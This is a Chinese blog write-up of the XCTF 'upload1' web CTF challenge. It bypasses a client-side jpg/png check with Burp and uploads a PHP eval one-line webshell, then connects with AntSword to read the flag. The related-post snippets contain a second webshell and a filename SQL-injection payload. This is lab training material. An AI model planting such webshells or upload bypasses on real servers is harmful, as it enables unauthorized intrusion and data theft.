web攻防世界2分题(upload1)

最新推荐文章于 2023-05-21 18:00:00 发布
最新推荐文章于 2023-05-21 18:00:00 发布
阅读量194 收藏
点赞数 1
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45791542/article/details/107578438
版权

读题

发现是一个文件上传
在这里插入图片描述

查看源码

点击鼠标右键,再点击查看源码
在这里插入图片描述
发现只能上传jpg 和 png格式

想着可以上传一个一句话木马

<?php @eval($_POST['helter']);?>

在记事本中将txt后缀改成jpg上传
用burp抓取上传包
在这里插入图片描述在这里插入图片描述
在这里插入图片描述然后用蚁剑连接
1、鼠标右键点击左边空白处,选择添加数据
在这里插入图片描述2、URL地址填题目地址+上传文件路径
也就是http://220.249.52.133:36407/upload/1595668911.upload.php
密码就是一句话木马中的“helter”
点击添加
在这里插入图片描述
添加成功后,鼠标右键点击网址,再点击文件管理
在这里插入图片描述

然后从www目录中找到flag.php,打开,发现了flag
在这里插入图片描述在这里插入图片描述

Phoenix-Pl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界web区 难度等级:2(upload1,web2,Web_php_include,supersqli,warmup)
m0_68074153的博客
07-12 377
攻防世界做题笔记
攻防世界 文件上传总结
qq_56559508的博客
11-19 504
web安全 upload上传漏洞
攻防世界-web-upload1
wuh2333的博客
05-21 241
攻防世界upload1
攻防世界进阶upload
舞动的獾
07-05 5297
攻防世界进阶upload 注册登陆后,发现上传页面 试着上传一个文件3.php: 内容如下: <?php eval(@$_POST['a']); ?> 我们试着将它改个名字抓包,并且改为jpg,措辞测试发现只有jog能够传上去 虽然上传成功,但是并不能显示出文件名的位置,蚁剑连接失败 看到回显名称有uid号,无奈的丝毫没有头绪 只好看了大佬的博客,竟然是注入,文件名称注入 当...
攻防世界web进阶区upload详解
hxhxhxhxx的博客
08-13 1758
攻防世界web进阶区upload详解题目②CONV(N,from_base,to_base)③substr(string,start,length) 题目 进入页面是我们的注册 登录以后,发现可以文件上传 传完之后发现有回显,猜测可能是文件名注入 我们先进行一系列得上传测试,发现都不行 这时候,御剑发来了好消息, 这儿有一个include,classes的文件 我们使用burp康康有哪些过滤 发现被制为了空,我们猜一猜是双写绕过 下面解除文件名字注入 1.把文件名改成 a' +(selsele
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947409
中国首届医院网络安全攻防演练Web部分真题
07-13
中国首届医院网络安全攻防演练Web部分真题,厦门站。一个WEB站点 源码。
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界-高手进阶区之upload
Sacrifice_li的博客
06-12 557
进来页面如下: 然后就是正常的去注册一个用户,并且登录,我在这里也做了拦截,但是并没有什么有价值的信息: 登录进来之后是这样的一个页面,是文件上传(不过根据题目意思也是肯定可以知道的)。 我在这边也做了测试,只能够上传jpg文件,想要尝试php4,php5,php文件后缀都是不可以的。 然后我就在考虑是否是文件后缀截断上传,但是抓包截取内容之后并没有返回文件上传到哪里了,同时nikto和dirb扫描也没有发现什么有价值的信息。 接下来的话,就是看别人的wp了。不过说真的,第一次接触到.
攻防世界 web进阶—upload
weixin_42499640的博客
07-18 1429
这道题的大体思路是: 利用上传文件的文件名进行sql注入 这里先普及几个mysql函数的用法 1. CONV() 简单的来说这个函数就是用来进行***进制的转换***的 CONV(N,from_base,to_base) N是要转换的数据,from_base是原进制,to_base是目标进制。 select conv(16,10,16)...
攻防世界WEB进阶之upload
harry_c的博客
08-03 2585
攻防世界WEB进阶之upload第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 1星 题目来源: RCTF-2015 题目描述:暂无 脑洞很大的一题,首先题目什么都没给出,进入场景,注册自己的账号,登录出现文件上传,上传很多文件都显示文件后缀不行,如实使用burpsuite的intruder功能,遍历众多文件列表,发现只有jpg文件可以上传,好吧,那就只上传它。 第二步:实操 接着...
攻防世界 web upload1
YUK_103的博客
01-05 1938
题型 : 文件上传 这个看题目就应该能反应过来了 首先就给了一个上传界面,看一下源代码 下半段只是一个普通的文件上传脚本,但是这里面有个check()函数,说明和上面的js函数有点关系。就算你不会js(我也不会) 也应该能看懂:只能上传后缀名那俩个的文件。 其实这题很简单:先写一个一句话木马,然后后缀名修改成jpg或png。用burpsuite修改一下上传到它的服务器上,再用菜刀连接就行了 这...
攻防世界-upload1-(详细操作)做题笔记
qq_43715020的博客
06-14 6315
攻防世界-upload1-(详细操作)做题笔记
攻防世界upload
qq_51744055的博客
05-03 633
Hex()是MySQL的Sring函数。 此方法返回给定数字或字符串的十六进制字符串 a' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg 数据库名变成16进制 选取从第一个字母开始,往后数12个字母 hex 16进制再16进制 CONV(n,from_radix,to_radix):用于将n从from_radix进制转到to_radix进制 substr(str,start,length):将str从st
攻防世界 二(进阶篇)
sjt670994562的博客
06-06 1529
re-for-50-plz-50 该题比较简单,直接ida分析就可以,虽然不能出伪代码,但单看汇编就行 首先看到一串字符串,估计进行转码 看到异或 尝试python转码,得到flag The_Maya_Society 这几天来比较让我头秃的题目,脑洞题吧,可以取巧的那种,真的头秃还是实力不行,首先扔到ida静态分析,看到一个取时间的函数 所以跟时间肯定有关系,经搜索找到关键函数,打开观察...
[burp对蚁剑流量分析问题]
qq_44836237的博客
03-08 6120
这两天在用burp对蚁剑进行流量分析的学习 蚁剑首先打开代理设置,代理地址和端口配置成burp的 完成后蚁剑随便打开一个文件或者文件夹 burp抓到的包 (code是我蚁剑连接php文件的密码,就是里面设置的传参) ,另外记住要用个eval函数才能成功连接 把抓到的内容在burp的decode中进行解码 新建一个antsword_decode.php后把解码的内容进行动态调试看看具体是怎么实现的(这里要修改部分内容) 这里说一下实现原理大概就是burp抓到包后把文件路径进.
攻防世界upload1(web
yuanxu8877的博客
11-22 937
攻防世界web-upload1
攻防世界upload1
最新发布
07-28
- *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值